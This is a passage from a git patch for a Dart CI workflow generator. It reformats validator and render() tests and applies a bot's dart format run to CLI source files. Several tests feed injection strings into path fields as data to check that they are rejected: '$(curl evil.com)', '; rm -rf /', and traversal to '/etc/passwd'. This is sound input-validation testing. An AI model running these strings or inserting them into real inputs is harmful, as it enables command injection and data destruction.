]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': r'packages\foo'}, + ], + ), ); expect(errors, anyElement(contains('forward slashes'))); }); test('sub_packages path with unsupported characters produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo bar'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo bar'}, + ], + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); - test('sub_packages path with leading/trailing whitespace produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': ' packages/foo '}, - ]), - ); - expect(errors, anyElement(contains('whitespace'))); - }); + test( + 'sub_packages path with leading/trailing whitespace produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ' packages/foo '}, + ], + ), + ); + expect(errors, anyElement(contains('whitespace'))); + }, + ); test('sub_packages path with trailing tab triggers whitespace error', () { // Trailing \t means trimmed != value, so the whitespace check fires first. final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo\t'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo\t'}, + ], + ), ); expect(errors, anyElement(contains('whitespace'))); }); - test('sub_packages path with embedded tab triggers newlines/tabs error', () { - // Embedded tab: trim() is identity, so newlines/tabs check catches it. - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/f\too'}, - ]), - ); - expect(errors, anyElement(contains('newlines/tabs'))); - }); + test( + 'sub_packages path with embedded tab triggers newlines/tabs error', + () { + // Embedded tab: trim() is identity, so newlines/tabs check catches it. + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/f\too'}, + ], + ), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }, + ); test('sub_packages duplicate name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'foo', 'path': 'packages/bar'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'foo', 'path': 'packages/bar'}, + ], + ), ); expect(errors, anyElement(contains('duplicate name "foo"'))); }); - test('sub_packages duplicate path (after normalization) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/foo'}, - {'name': 'bar', 'path': 'packages/./foo'}, - ]), - ); - expect(errors, anyElement(contains('duplicate path'))); - }); + test( + 'sub_packages duplicate path (after normalization) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/foo'}, + {'name': 'bar', 'path': 'packages/./foo'}, + ], + ), + ); + expect(errors, anyElement(contains('duplicate path'))); + }, + ); test('valid sub_packages passes', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'core', 'path': 'packages/core'}, - {'name': 'api', 'path': 'packages/api'}, - ]), + _validConfig( + subPackages: [ + {'name': 'core', 'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + ), ); expect(errors.where((e) => e.contains('sub_packages')), isEmpty); }); @@ -474,7 +560,10 @@ void main() { final config = _validConfig(); config['runner_overrides'] = 'invalid'; final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('runner_overrides must be an object'))); + expect( + errors, + anyElement(contains('runner_overrides must be an object')), + ); }); test('runner_overrides with invalid platform key produces error', () { @@ -581,58 +670,85 @@ void main() { test('web_test.paths with empty string produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [''], - }), + _validConfig( + webTest: { + 'paths': [''], + }, + ), ); expect(errors, anyElement(contains('must be a non-empty string'))); }); test('web_test.paths with absolute path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['/etc/passwd'], - }), + _validConfig( + webTest: { + 'paths': ['/etc/passwd'], + }, + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('web_test.paths with traversal produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['../../../etc/passwd'], - }), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); - - test('web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', () { final errors = WorkflowGenerator.validate( _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - webTest: {'paths': ['test/web/../../../etc/passwd']}, + webTest: { + 'paths': ['../../../etc/passwd'], + }, ), ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); - - test('web_test.paths with shell metacharacters (\$(curl evil)) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'$(curl evil)'], - }), + expect( + errors, + anyElement(contains('must not traverse outside the repo')), ); - expect(errors, anyElement(contains('unsupported characters'))); }); - test('web_test.paths with shell metacharacters (; rm -rf /) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['; rm -rf /'], - }), - ); - expect(errors, anyElement(contains('unsupported characters'))); - }); + test( + 'web_test.paths with embedded traversal (test/web/../../../etc/passwd) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + webTest: { + 'paths': ['test/web/../../../etc/passwd'], + }, + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); + + test( + 'web_test.paths with shell metacharacters (\$(curl evil)) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': [r'$(curl evil)'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }, + ); + + test( + 'web_test.paths with shell metacharacters (; rm -rf /) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['; rm -rf /'], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }, + ); test('web_test.paths duplicate (after normalization) produces error', () { final errors = WorkflowGenerator.validate( @@ -648,57 +764,75 @@ void main() { test('web_test.paths with backslashes produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'test\web\foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': [r'test\web\foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('forward slashes'))); }); test('web_test.paths with unsupported characters produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web test/foo.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web test/foo.dart'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with leading whitespace produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [' test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': [' test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('whitespace'))); }); test('web_test.paths with tilde produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['~/test/foo.dart'], - }), + _validConfig( + webTest: { + 'paths': ['~/test/foo.dart'], + }, + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('web_test.paths with newline produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/foo\nbar.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/foo\nbar.dart'], + }, + ), ); expect(errors, anyElement(contains('newlines/tabs'))); }); - test('web_test.paths with embedded traversal that escapes repo produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/../../../etc/passwd'], - }), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); + test( + 'web_test.paths with embedded traversal that escapes repo produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['test/../../../etc/passwd'], + }, + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); test('web_test.paths with embedded .. that stays in repo is fine', () { // test/web/../../etc/passwd normalizes to etc/passwd (still inside repo) @@ -715,54 +849,66 @@ void main() { test('web_test.paths with shell metacharacter \$ produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': [r'$(curl evil.com)'], - }), + _validConfig( + webTest: { + 'paths': [r'$(curl evil.com)'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with shell metacharacter ; produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/foo; rm -rf /'], - }), + _validConfig( + webTest: { + 'paths': ['test/foo; rm -rf /'], + }, + ), ); expect(errors, anyElement(contains('unsupported characters'))); }); test('web_test.paths with duplicate paths produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('duplicate path'))); }); test('web_test.paths with duplicate normalized paths produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/./foo_test.dart', 'test/web/foo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('duplicate path'))); }); test('web_test.paths with trailing whitespace produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/foo_test.dart '], - }), + _validConfig( + webTest: { + 'paths': ['test/web/foo_test.dart '], + }, + ), ); expect(errors, anyElement(contains('whitespace'))); }); test('web_test.paths with tab produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(webTest: { - 'paths': ['test/web/\tfoo_test.dart'], - }), + _validConfig( + webTest: { + 'paths': ['test/web/\tfoo_test.dart'], + }, + ), ); expect(errors, anyElement(contains('newlines/tabs'))); }); @@ -809,41 +955,87 @@ void main() { expect(errors, anyElement(contains('unknown key "concurreny"'))); }); - test('cross-validation: web_test config present but feature disabled produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': false}, - webTest: {'concurrency': 2, 'paths': ['test/web/']}, - ), - ); - expect(errors, anyElement(contains('web_test config is present but ci.features.web_test is not enabled'))); - }); + test( + 'cross-validation: web_test config present but feature disabled produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': false}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); + expect( + errors, + anyElement( + contains( + 'web_test config is present but ci.features.web_test is not enabled', + ), + ), + ); + }, + ); - test('cross-validation: web_test feature enabled but config wrong type produces error', () { - final config = _validConfig( - features: {'proto': false, 'lfs': false, 'web_test': true}, - ); - config['web_test'] = 'yes'; - final errors = WorkflowGenerator.validate(config); - expect(errors, anyElement(contains('web_test must be an object'))); - }); + test( + 'cross-validation: web_test feature enabled but config wrong type produces error', + () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = 'yes'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }, + ); + + test( + 'cross-validation: web_test feature enabled with no config object (null) is allowed, uses defaults', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + // webTest: null (omitted) — config is optional when feature is enabled + ), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }, + ); + + test( + 'cross-validation: web_test feature enabled with explicit null config is allowed', + () { + final config = _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + ); + config['web_test'] = null; + final errors = WorkflowGenerator.validate(config); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }, + ); }); // ---- fully valid config produces no errors ---- test('fully valid config produces no errors', () { - final errors = WorkflowGenerator.validate(_validConfig( - dartSdk: '3.9.2', - features: {'proto': true, 'lfs': false, 'web_test': true}, - platforms: ['ubuntu', 'macos'], - secrets: {'API_KEY': 'MY_SECRET'}, - pat: 'MY_PAT', - lineLength: 120, - subPackages: [ - {'name': 'core', 'path': 'packages/core'}, - ], - runnerOverrides: {'ubuntu': 'custom-runner'}, - webTest: {'concurrency': 2, 'paths': ['test/web/']}, - )); + final errors = WorkflowGenerator.validate( + _validConfig( + dartSdk: '3.9.2', + features: {'proto': true, 'lfs': false, 'web_test': true}, + platforms: ['ubuntu', 'macos'], + secrets: {'API_KEY': 'MY_SECRET'}, + pat: 'MY_PAT', + lineLength: 120, + subPackages: [ + {'name': 'core', 'path': 'packages/core'}, + ], + runnerOverrides: {'ubuntu': 'custom-runner'}, + webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }, + ), + ); expect(errors, isEmpty); }); @@ -879,21 +1071,23 @@ void main() { test('returns null when config.json exists but has no "ci" key', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'repo_name': 'test_repo', - })); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'repo_name': 'test_repo'})); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNull); }); test('returns the ci map when config.json has a valid "ci" section', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': { - 'dart_sdk': '3.9.2', - 'features': {'proto': true}, - }, - })); + File('${configDir.path}/config.json').writeAsStringSync( + json.encode({ + 'ci': { + 'dart_sdk': '3.9.2', + 'features': {'proto': true}, + }, + }), + ); final result = WorkflowGenerator.loadCiConfig(tempDir.path); expect(result, isNotNull); expect(result, isA>()); @@ -903,29 +1097,45 @@ void main() { test('throws StateError on malformed JSON', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync('{ not valid json'); + File( + '${configDir.path}/config.json', + ).writeAsStringSync('{ not valid json'); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA().having((e) => e.message, 'message', contains('Malformed JSON'))), + throwsA( + isA().having( + (e) => e.message, + 'message', + contains('Malformed JSON'), + ), + ), ); }); test('throws StateError when "ci" is not a Map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': 'not_a_map', - })); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'ci': 'not_a_map'})); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), - throwsA(isA().having((e) => e.message, 'message', contains('object'))), + throwsA( + isA().having( + (e) => e.message, + 'message', + contains('object'), + ), + ), ); }); test('throws StateError when "ci" is a list instead of a map', () { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({ - 'ci': [1, 2, 3], - })); + File('${configDir.path}/config.json').writeAsStringSync( + json.encode({ + 'ci': [1, 2, 3], + }), + ); expect( () => WorkflowGenerator.loadCiConfig(tempDir.path), throwsA(isA()), @@ -934,10 +1144,13 @@ void main() { }); // =========================================================================== - // P0: render() — web_test output integration tests + // P0: render() — validation guard and web_test output integration tests // =========================================================================== group('WorkflowGenerator.render()', () { - Map _minimalValidConfig({bool webTest = false, Map? webTestConfig}) { + Map _minimalValidConfig({ + bool webTest = false, + Map? webTestConfig, + }) { return _validConfig( dartSdk: '3.9.2', features: { @@ -951,49 +1164,140 @@ void main() { ); } - test('web_test=false: rendered output does not contain web-test job', () { + // ---- render() validation guard (defense-in-depth) ---- + test( + 'render throws StateError when config is invalid (missing dart_sdk)', + () { + final gen = WorkflowGenerator( + ciConfig: {'features': {}}, + toolingVersion: '0.0.0-test', + ); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('dart_sdk'), + ), + ), + ), + ); + }, + ); + + test( + 'render throws StateError when config has multiple validation errors', + () { + final gen = WorkflowGenerator( + ciConfig: {}, + toolingVersion: '0.0.0-test', + ); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('dart_sdk'), + contains('features'), + ), + ), + ), + ); + }, + ); + + test('render throws StateError when config has invalid web_test type', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: false), + ciConfig: _validConfig( + features: {'proto': false, 'lfs': false, 'web_test': true}, + )..['web_test'] = 'yes', toolingVersion: '0.0.0-test', ); - final rendered = gen.render(); - expect(rendered, isNot(contains('web-test:'))); - expect(rendered, isNot(contains('dart test -p chrome'))); + expect( + () => gen.render(), + throwsA( + isA().having( + (e) => e.message, + 'message', + allOf( + contains('Cannot render with invalid config'), + contains('web_test must be an object'), + ), + ), + ), + ); }); - test('web_test=true: rendered output contains web-test job and chrome test', () { + test('render succeeds on valid config', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig(webTest: true), + ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains('web-test:')); - expect(rendered, contains('dart test -p chrome')); + expect(rendered, isNotEmpty); + expect(rendered, contains('name:')); }); - test('web_test=true with paths: rendered output includes path args', () { + test('web_test=false: rendered output does not contain web-test job', () { final gen = WorkflowGenerator( - ciConfig: _minimalValidConfig( - webTest: true, - webTestConfig: {'paths': ['test/web/foo_test.dart'], 'concurrency': 2}, - ), + ciConfig: _minimalValidConfig(webTest: false), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains("'test/web/foo_test.dart'")); - expect(rendered, contains('--concurrency=2')); + expect(rendered, isNot(contains('web-test:'))); + expect(rendered, isNot(contains('dart test -p chrome'))); }); - test('web_test=true with concurrency at upper bound (32): rendered output uses 32', () { + test( + 'web_test=true with omitted config uses default concurrency and no explicit paths', + () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(webTest: true), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('web-test:')); + expect(rendered, contains('dart test -p chrome')); + expect(rendered, contains('--concurrency=1')); + expect(rendered, isNot(contains("'test/"))); + }, + ); + + test('web_test=true with paths: rendered output includes path args', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig( webTest: true, - webTestConfig: {'concurrency': 32}, + webTestConfig: { + 'paths': ['test/web/foo_test.dart'], + 'concurrency': 2, + }, ), toolingVersion: '0.0.0-test', ); final rendered = gen.render(); - expect(rendered, contains('--concurrency=32')); + expect(rendered, contains("'test/web/foo_test.dart'")); + expect(rendered, contains('--concurrency=2')); }); + + test( + 'web_test=true with concurrency at upper bound (32): rendered output uses 32', + () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig( + webTest: true, + webTestConfig: {'concurrency': 32}, + ), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains('--concurrency=32')); + }, + ); }); } From 9292802b3927384f70b5c01ffe8f69b203beca18 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 25 Feb 2026 00:50:35 +0000 Subject: [PATCH 05/16] bot(format): apply dart format --line-length 120 [skip ci] --- lib/src/cli/commands/test_command.dart | 38 +- lib/src/cli/manage_cicd.dart | 795 +++++----------------- lib/src/cli/utils/step_summary.dart | 57 +- lib/src/cli/utils/workflow_generator.dart | 232 ++----- 4 files changed, 258 insertions(+), 864 deletions(-) diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 807a249..4103fe7 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -27,8 +27,7 @@ class TestCommand extends Command { final String name = 'test'; @override - final String description = - 'Run dart test with full output capture and job summary.'; + final String description = 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -44,9 +43,7 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = - Platform.environment['TEST_LOG_DIR'] ?? - '$repoRoot/.dart_tool/test-logs'; + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); Logger.info('Log directory: $logDir'); @@ -57,9 +54,7 @@ class TestCommand extends Command { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); - StepSummary.write( - '## Test Results\n\n**No test/ directory found — skipped.**\n', - ); + StepSummary.write('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { // Build test arguments with two file reporters + expanded console output final testArgs = [ @@ -79,11 +74,7 @@ class TestCommand extends Command { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. - final process = await Process.start( - Platform.resolvedExecutable, - testArgs, - workingDirectory: repoRoot, - ); + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -103,19 +94,14 @@ class TestCommand extends Command { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error( - 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([ - stdoutDone, - stderrDone, - ]).timeout(const Duration(seconds: 30)); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -180,9 +166,7 @@ class TestCommand extends Command { if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); - Logger.error( - ' dart pub get failed for $name (exit code ${pubGetResult.exitCode})', - ); + Logger.error(' dart pub get failed for $name (exit code ${pubGetResult.exitCode})'); failures.add(name); continue; } @@ -197,9 +181,7 @@ class TestCommand extends Command { final spExitCode = await spProcess.exitCode.timeout( processTimeout, onTimeout: () { - Logger.error( - 'Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); spProcess.kill(); // No signal arg — cross-platform safe return -1; }, @@ -214,9 +196,7 @@ class TestCommand extends Command { } if (failures.isNotEmpty) { - Logger.error( - 'Tests failed for ${failures.length} package(s): ${failures.join(', ')}', - ); + Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `$name`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 463b4be..2dd1ade 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -86,25 +86,19 @@ String _resolveToolingPackageRoot() { final configFile = File('${dir.path}/.dart_tool/package_config.json'); if (configFile.existsSync()) { try { - final configJson = - json.decode(configFile.readAsStringSync()) as Map; + final configJson = json.decode(configFile.readAsStringSync()) as Map; final packages = configJson['packages'] as List? ?? []; for (final pkg in packages) { - if (pkg is Map && - pkg['name'] == 'runtime_ci_tooling') { + if (pkg is Map && pkg['name'] == 'runtime_ci_tooling') { final rootUri = pkg['rootUri'] as String? ?? ''; if (rootUri.startsWith('file://')) { return Uri.parse(rootUri).toFilePath(); } // Relative URI -- resolve against the .dart_tool/ directory - final resolved = Uri.parse( - '${dir.path}/.dart_tool/', - ).resolve(rootUri); + final resolved = Uri.parse('${dir.path}/.dart_tool/').resolve(rootUri); final resolvedPath = resolved.toFilePath(); // Strip trailing slash - return resolvedPath.endsWith('/') - ? resolvedPath.substring(0, resolvedPath.length - 1) - : resolvedPath; + return resolvedPath.endsWith('/') ? resolvedPath.substring(0, resolvedPath.length - 1) : resolvedPath; } } } catch (_) {} @@ -120,9 +114,7 @@ String _resolveToolingPackageRoot() { } // Fallback: assume scripts/prompts/ (legacy location in consuming repos) - _warn( - 'Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.', - ); + _warn('Could not resolve runtime_ci_tooling package root. Prompt scripts may not be found.'); return Directory.current.path; } @@ -201,9 +193,7 @@ void main(List args) async { if (repoRoot == null) { _error('Could not find ${config.repoName} repo root.'); _error('Run this script from inside the repository.'); - _error( - 'If this is a new project, run "init" first to create .runtime_ci/config.json.', - ); + _error('If this is a new project, run "init" first to create .runtime_ci/config.json.'); exit(1); } @@ -298,19 +288,14 @@ Future _runSetup(String repoRoot) async { if (geminiKey != null && geminiKey.isNotEmpty) { _success('GEMINI_API_KEY is set'); } else { - _warn( - 'GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY=', - ); + _warn('GEMINI_API_KEY is not set. Set it via: export GEMINI_API_KEY='); } - final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; if (ghToken != null && ghToken.isNotEmpty) { _success('GitHub token is set'); } else { - _info( - 'No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.', - ); + _info('No GH_TOKEN/GITHUB_TOKEN set. Run "gh auth login" for GitHub CLI auth.'); } // Install Dart dependencies @@ -366,10 +351,7 @@ Future _runValidate(String repoRoot) async { } } else if (file.endsWith('.dart')) { // Validate Dart files compile - final result = Process.runSync('dart', [ - 'analyze', - path, - ], workingDirectory: repoRoot); + final result = Process.runSync('dart', ['analyze', path], workingDirectory: repoRoot); if (result.exitCode == 0) { _success('Valid Dart: $file'); } else { @@ -429,9 +411,7 @@ Future _runExplore(String repoRoot) async { _header('Stage 1: Explorer Agent (Gemini 3 Pro Preview)'); if (!_geminiAvailable(warnOnly: true)) { - _warn( - 'Skipping explore stage (Gemini unavailable). No changelog data will be generated.', - ); + _warn('Skipping explore stage (Gemini unavailable). No changelog data will be generated.'); return; } @@ -451,10 +431,7 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync( - 'dart run $promptScriptPath "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -462,9 +439,7 @@ Future _runExplore(String repoRoot) async { ctx.savePrompt('explore', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI with explorer prompt (${prompt.length} chars)'); return; } @@ -528,11 +503,7 @@ Future _runExplore(String repoRoot) async { // the workflow artifact upload step. _info(''); _info('Validating Stage 1 artifacts...'); - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { // Check RunContext path first, then hardcoded fallback final ctxPath = '${ctx.runDir}/explore/$name'; @@ -615,10 +586,7 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync( - 'dart run $composerScript "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -626,9 +594,7 @@ Future _runCompose(String repoRoot) async { ctx.savePrompt('compose', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini CLI with composer prompt (${prompt.length} chars)'); return; } @@ -637,11 +603,7 @@ Future _runCompose(String repoRoot) async { // Build the @ includes for file context. // Stage 1 artifacts may be at /tmp/ (CI download) or .runtime_ci/runs/explore/ (local). final includes = []; - final artifactNames = [ - 'commit_analysis.json', - 'pr_data.json', - 'breaking_changes.json', - ]; + final artifactNames = ['commit_analysis.json', 'pr_data.json', 'breaking_changes.json']; for (final name in artifactNames) { if (File('/tmp/$name').existsSync()) { includes.add('@/tmp/$name'); @@ -689,8 +651,7 @@ Future _runCompose(String repoRoot) async { if (result.exitCode != 0) { _warn('Gemini CLI exited with code ${result.exitCode}'); - if (composeStderr.isNotEmpty) - _warn(' stderr: ${composeStderr.split('\n').first}'); + if (composeStderr.isNotEmpty) _warn(' stderr: ${composeStderr.split('\n').first}'); } if (rawCompose.isNotEmpty) { @@ -731,9 +692,7 @@ Future _runCompose(String repoRoot) async { try { final bytes = File('$repoRoot/CHANGELOG.md').readAsBytesSync(); changelogContent = String.fromCharCodes(bytes.where((b) => b < 128)); - _info( - 'Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)', - ); + _info('Read CHANGELOG.md with ASCII fallback (${changelogContent.length} chars)'); } catch (_) { changelogContent = ''; } @@ -788,8 +747,7 @@ Future _runReleaseNotes(String repoRoot) async { _warn('Skipping release notes (Gemini unavailable).'); // Create minimal fallback final newVersion = _versionOverride ?? 'unknown'; - final fallback = - '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; + final fallback = '# ${config.repoName} v$newVersion\n\nSee CHANGELOG.md for details.'; File('/tmp/release_notes_body.md').writeAsStringSync(fallback); return; } @@ -799,10 +757,7 @@ Future _runReleaseNotes(String repoRoot) async { final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); // Derive bump type - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' 